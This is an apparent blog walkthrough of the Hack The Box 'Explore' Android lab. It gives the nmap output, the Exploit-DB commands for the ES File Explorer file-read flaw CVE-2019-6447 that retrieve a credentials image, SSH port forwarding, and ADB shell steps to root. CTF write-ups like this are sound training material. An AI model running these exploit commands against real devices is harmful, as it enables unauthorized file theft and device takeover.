Today we come up with another challenge from “Hackthebox” called “explore”. This lab is based on android exploitation in which ES explorer is vulnerable . So without wasting too much time let start.
Level : Easy
Attacking Strategy
- Networking Scanning
- Nmap
- Exploitation
- ES explorer Vulnerability (CVE-2019-6447)
- Privilege Escalation
- Port Forwarding
- ADB Shell
Walkthrough
IP Address : 10.10.10.247
We start with Nmap scan which reveals some open ports and services like 2222 SSH , HTTP on 42135, HTTP on 59777,etc.
nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.10.247Nmap scan report for 10.10.10.247
Host is up (0.091s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
36917/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:34 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Sat, 16 Oct 2021 06:03:34 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Sat, 16 Oct 2021 06:03:39 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:55 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:39 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:55 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:55 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Sat, 16 Oct 2021 06:03:55 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
Service Info: Device: phoneFrom the nmap result its clear this is some kind of android from service information,further we start enumerating port 59777 HTTP so we run content discovery tools like gubuster , dirb but nothing in hand.In 2018 we have KITKAT based android device in which file system representation is like sdcard,sdcard0,sdcard1 which i remember correctly because of rooting the device at that time.So we think can we enumerate on this endpoint.
feroxbuster -u http://10.10.10.247:59777/sdcard -x txt 
And we got the flag here , but after sometime this is dead end for this service as no other disclosure happen .
Exploitation
So we moved to second port i.e port 42135 on which ES File Explorer is running on , after google about the service we got the exploit in which Arbitrary File read vulnerability exits.
So we simply download the exploit from exploit-db , after reading the exploit we can pass some command like getDeviceInfo , getFile , etc.
python3 50070.py getDeviceInfo 10.10.10.247
python3 50070.py listPics 10.10.10.247
python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg
From “listpics” command there are some picture listed in which one is listed as “creds.jpg” so we simply download the file with “getFile” command and we got credentials from “kristi” user.
kristi
[email protected]!
Privilege Escalation
Now we got the SSH credentials for low user but we want to hunt for root power and this time we stuck ,as only port which is left without touching is 5555 which is used by ADB by default . For further we need to study about adb .After study about adb all we need to do a simple port forwarding and then access the shell over localhost.
ssh -L 5555:localhost:5555 [email protected] -p 2222Once the port forwarding is done we can access the shell on local host and switch user to root and collect flags.
adb -s 127.0.0.1:5555 shell
su
cat data/root.txt